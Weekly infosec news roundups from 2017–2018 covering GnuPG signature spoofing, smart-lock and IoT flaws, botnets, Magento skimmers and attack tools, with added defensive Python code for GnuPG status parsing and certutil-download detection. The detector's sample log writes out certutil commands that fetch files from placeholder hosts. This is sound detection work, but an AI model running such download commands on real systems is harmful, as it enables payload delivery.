InfoSec Week 25, 2018

Marcus Brinkmann demonstrated how some GnuPG configuration options allow remote attackers to spoof arbitrary signatures. He used the embedded “filename” parameter of OpenPGP literal data packets, together with the verbose option being set in the victim's gpg.conf file.
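Added example (not code from the original post and not GnuPG's own tooling): the practical countermeasure for this class of spoof is to make the signature decision on GnuPG's machine-readable status lines, read from a file descriptor of their own, and never on the human-readable log that the verbose option writes to stderr. The status stream below is a constructed sample; the fingerprints and the "example.invalid" signer address are placeholders, and the `verify_file` wrapper assumes a `gpg` binary on PATH.

```python
"""Decide on gpg --status-fd output, not on stderr text."""
import subprocess
from dataclasses import dataclass, field
from typing import Iterable, List

STATUS_PREFIX = "[GNUPG:] "
# Status keywords that must never be ignored when they appear.
PROBLEM_KEYWORDS = {"BADSIG", "ERRSIG", "EXPSIG", "EXPKEYSIG",
                    "REVKEYSIG", "NODATA", "NO_PUBKEY"}


@dataclass
class Verdict:
    good: bool
    signers: List[str] = field(default_factory=list)   # full fingerprints
    problems: List[str] = field(default_factory=list)


def parse_status(status_text: str) -> Verdict:
    """Parse the text gpg wrote to its --status-fd.

    Only lines with the exact "[GNUPG:] " prefix count. A signature is
    accepted only if at least one VALIDSIG line (carrying the signer's
    full fingerprint) is present and no problem keyword appeared.
    """
    signers, problems = [], []
    for raw in status_text.splitlines():
        if not raw.startswith(STATUS_PREFIX):
            continue
        fields = raw[len(STATUS_PREFIX):].split()
        if not fields:
            continue
        keyword = fields[0]
        if keyword == "VALIDSIG" and len(fields) >= 2:
            signers.append(fields[1])
        elif keyword in PROBLEM_KEYWORDS:
            problems.append(keyword)
    return Verdict(good=bool(signers) and not problems,
                   signers=signers, problems=problems)


def is_trusted(verdict: Verdict, allowed_fingerprints: Iterable[str]) -> bool:
    """Pin the expected signer(s): good signature AND every signer allowed."""
    allowed = {f.upper() for f in allowed_fingerprints}
    return verdict.good and all(s.upper() in allowed for s in verdict.signers)


def verify_file(signature_path: str, data_path: str,
                allowed_fingerprints: Iterable[str]) -> bool:
    """Run gpg with status lines on stdout and the log on stderr.

    The decision is taken from stdout only; whatever a crafted filename
    injects into the verbose log on stderr cannot reach the parser.
    (Assumes gpg is installed; not exercised by the offline sample below.)
    """
    proc = subprocess.run(
        ["gpg", "--batch", "--status-fd", "1", "--verify",
         signature_path, data_path],
        capture_output=True, text=True)
    return is_trusted(parse_status(proc.stdout), allowed_fingerprints)


# Constructed sample status streams (placeholder fingerprints/addresses).
EXPECTED_FPR = "0123456789ABCDEF0123456789ABCDEF01234567"
STATUS_GOOD = (
    "[GNUPG:] NEWSIG\n"
    "[GNUPG:] GOODSIG 0123456789ABCDEF01234567 Example Signer <signer@example.invalid>\n"
    f"[GNUPG:] VALIDSIG {EXPECTED_FPR} 2018-06-14 1528963200 0 4 0 1 8 00 {EXPECTED_FPR}\n"
    "[GNUPG:] TRUST_ULTIMATE 0 pgp\n"
)
STATUS_BAD = (
    "[GNUPG:] NEWSIG\n"
    "[GNUPG:] BADSIG 0123456789ABCDEF01234567 Example Signer <signer@example.invalid>\n"
)
# What a log-scraping consumer would have looked at: human-readable text.
LOG_TEXT_ONLY = 'gpg: Good signature from "Example Signer <signer@example.invalid>"\n'

if __name__ == "__main__":
    print("good stream trusted:", is_trusted(parse_status(STATUS_GOOD), {EXPECTED_FPR}))
    print("bad stream trusted:", is_trusted(parse_status(STATUS_BAD), {EXPECTED_FPR}))
    print("log text alone trusted:", parse_status(LOG_TEXT_ONLY).good)
```

The design point is the separation of channels: the parser is deliberately strict, but its real protection comes from being fed only the status descriptor, so forged "Good signature" text in the log never becomes an input to the decision.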

The Tapplock smart lock has critical bugs that make its protection trivial to defeat. It uses an AES key derived from the lock's MAC address, so anyone with a Bluetooth-enabled smartphone can recover the key once within Bluetooth range of the lock.

Crooks are injecting a credit-card-stealing backdoor into the config files of hacked Magento e-commerce sites. Because the backdoor is loaded together with the configuration, it can reinfect the rest of the code base over and over again.

The updated Satori botnet has begun a network-wide scan looking for exploitable XiongMai uc-httpd 1.0.0 devices (CVE-2018-10088).

Baby monitors in the USA were hacked via an obscure Chinese IoT cloud. The woman from the Facebook post claims that someone controlled the camera remotely and spied on her, possibly listening in on conversations.

OpenBSD has disabled Intel's hyper-threading due to possibly exploitable Spectre-class bugs in the architecture.

Linux is getting support for in-kernel hibernation encryption. It encrypts the hibernation image of memory written to disk, thereby strengthening full-disk encryption on Linux and reducing the attack surface.

OTSECA ((ot)her (sec)urity (a)wareness) is an open-source security auditing tool that searches and dumps system configuration. It can generate reports in HTML or RAW-HTML format.

InfoSec Week 15, 2018

The U.S. Secret Service is warning about a new scam scheme in which crooks intercept new debit cards in the mail and replace the chips on the cards with chips from old cards. Once the owners activate the cards, the crooks use the stolen chips for their own financial gain.

Russian state regulator Roskomnadzor has ordered the Telegram messaging application to be blocked, 48 hours after it missed a deadline to hand over the encryption keys to its users' online conversations. I am not sure whether the Telegram protocol is actually blocked in Russia now.

The new Android P version will force applications to communicate over TLS-secured connections by default.

Kudelski Security published a walk-through guide to Manger's attack against RSA-OAEP. A 1-bit leak from the oracle suffices to decrypt ciphertexts.

An in-depth article about stealing FUZE credit card contents via Bluetooth.

Understanding Code Signing Abuse in Malware Campaigns: pretty good statistics.

There is a vulnerability that bypasses the tamper protection provided by Sophos Endpoint Protection v10.7. The protection mechanism can be bypassed by deleting an unprotected registry key.

Several vulnerabilities have been found in the Apache HTTPD server. Update now.

The Microsoft Windows tool certutil.exe, meant for displaying certification authority information, can be used to fetch data from the internet in a similar fashion to wget or curl.
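Added example, not from the original post: a small detection routine that flags certutil.exe being used as a downloader in process-creation telemetry. The log records below are constructed for this example and use a flat `timestamp|host|user|image|command_line` layout that is an assumption, not any vendor's real schema; the hosts under `example.invalid` are placeholders. The switches it keys on (`-urlcache` and the `-verifyctl` variant) are real certutil options that accept a URL.

```python
"""Flag certutil.exe invocations that fetch content from a URL."""
import re
from typing import Dict, List, Optional

# Constructed sample telemetry: timestamp|host|user|image|command_line
SAMPLE_LOG = (
    "2018-04-10T09:12:03Z|ws01|alice|C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -dump C:\\temp\\server.cer\n"
    "2018-04-10T09:13:44Z|ws02|bob|C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -urlcache -split -f http://downloads.example.invalid/update.bin "
    "C:\\Users\\Public\\update.bin\n"
    "2018-04-10T09:15:01Z|ws03|carol|C:\\Tools\\curl.exe|"
    "curl.exe -O http://downloads.example.invalid/tool.zip\n"
    "2018-04-10T09:16:27Z|ws04|dave|C:\\Windows\\System32\\certutil.exe|"
    "CERTUTIL.EXE /verifyctl /f /split https://cdn.example.invalid/a.bin\n"
)

URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
# certutil verbs that take a URL and write the fetched bytes to disk/cache.
FETCH_SWITCHES = {"urlcache", "verifyctl"}


def parse_record(line: str) -> Dict[str, str]:
    """Split one flat record into its five fields (command line may contain '|')."""
    ts, host, user, image, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "cmd": cmd}


def certutil_download_url(image: str, cmd: str) -> Optional[str]:
    """Return the fetched URL if this is certutil used as a downloader, else None.

    Windows accepts both '-' and '/' as switch prefixes and is case-insensitive,
    so the check normalises both before comparing against FETCH_SWITCHES.
    """
    if not image.lower().endswith("\\certutil.exe"):
        return None
    tokens = cmd.split()
    switches = {t.lstrip("-/").lower() for t in tokens[1:] if t[:1] in "-/"}
    if not switches & FETCH_SWITCHES:
        return None
    match = URL_RE.search(cmd)
    return match.group(0) if match else None


def scan(log_text: str) -> List[Dict[str, str]]:
    """Run the check over every record and collect alerts."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        url = certutil_download_url(rec["image"], rec["cmd"])
        if url:
            alerts.append({"host": rec["host"], "user": rec["user"], "url": url})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"certutil download on {alert['host']} by {alert['user']}: {alert['url']}")
```

Tuning note: certutil legitimately fetches CRLs and CA certificates from internal PKI hosts, so in production this rule would carry an allow-list of internal URL prefixes rather than alerting on every match.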

There is a paper about breaking the 256-bit security level of WalnutDSA (a NIST post-quantum candidate) in under a minute.

Snallygaster is a tool to scan for secrets on web servers.

A nice map of current Linux kernel defenses. The map shows the relations between vulnerability classes, current kernel defenses and bug-detection mechanisms.

InfoSec Week 47, 2017

According to the annual State of Open Source Security report, 77% of the 433,000 analyzed sites use at least one front-end JavaScript library with a known security vulnerability.

The AWS team published a blog post about the recent improvements to secure random number generation in Linux 4.14, OpenSSL and libc.

A really good introduction to anonymous communication network design and mix nets in general, published by Least Authority.

These guys reverse-engineered the Furby Connect DLC file format and are able to remotely upload their own logos and songs to the device over Bluetooth.

There is a critical vulnerability in macOS High Sierra: anyone can log in as root with an empty password after clicking the login button several times. For now, it can be mitigated simply by changing the root password.

Very good investigative journalism about the mysterious NSA contractor who could have provided top-secret documents to the Shadow Brokers.

Uber paid hackers $100k to delete stolen data on 57 million people and keep quiet. They even tried to disguise it as a bug bounty payment.

Someone published a remote code execution exploit for the Exim mail server (CVE-2017-16944) on GitHub. Shodan.io shows more than 400k servers with the vulnerable CHUNKING feature.

InfoSec Week 36, 2017

Security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in D-Link routers.

There is a new research paper on the security of Bluetooth stacks, named "The dangers of Bluetooth implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth stacks." Really alarming vulnerabilities are discussed.
From the paper: "BlueBorne allows attackers to take control of devices, access corporate data and networks, penetrate secure “air-gapped” networks, and spread malware to other devices. The attack does not require the targeted device to be set on discoverable mode or to be paired to the attacker’s device."

FireEye has analyzed a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability used by attackers to distribute the notorious FinFisher / FINSPY malware.
I have included an exploit example that is published on GitHub.

Kaspersky Lab has analyzed the trend of malicious cryptocurrency mining on infected machines.

The Android BankBot malware found on the Google Play store is targeting multiple UAE banking applications.

A good analysis of how a JavaScript framework can be abused to bypass XSS mitigations, specifically NoScript’s XSS filter.

The NSA had developed the capability to decrypt and decode Kazaa and eDonkey file-sharing traffic to determine which files are being shared and what queries are being performed over those P2P networks.

A formally verified implementation of Curve25519 made it into Firefox 57, and it is 20% faster on 64-bit architectures.

A nice curated list of IDA plugins.

InfoSec Week 8, 2017

Malware samples recovered from watering hole attacks against the Polish financial regulator's website contain false flags that fraudulently suggest Russian actors are behind the campaign. BAE Systems Threat Research attributed the attack to the notorious Lazarus Group.

TeamSpy malware targets high-profile industrial executives, researchers and diplomats using phishing attacks. If successful, the malware installs a keylogger and a hidden TeamViewer application.

The world's largest spam botnet, Necurs, with 5 million infected hosts, has added a DDoS module.

Montenegro suffered massive cyberattacks against government and media websites.

This one about the Cloudflare bug is all over the internet, but I found the report from the Google Project Zero engineer interesting.

Google announced the first SHA-1 collision attack, demonstrating it with two PDF files.

A short blog post with the self-explanatory headline "Why it sucks to be a Security Researcher", written by a Sakurity infosec guy.

Crackle is a tool to crack Bluetooth Smart (BLE) encryption. It exploits a flaw in the pairing mechanism that leaves all communications vulnerable to decryption by passive eavesdroppers.

Mercure is a tool for generating and managing phishing campaigns. It includes email templates, attachments and landing-page management.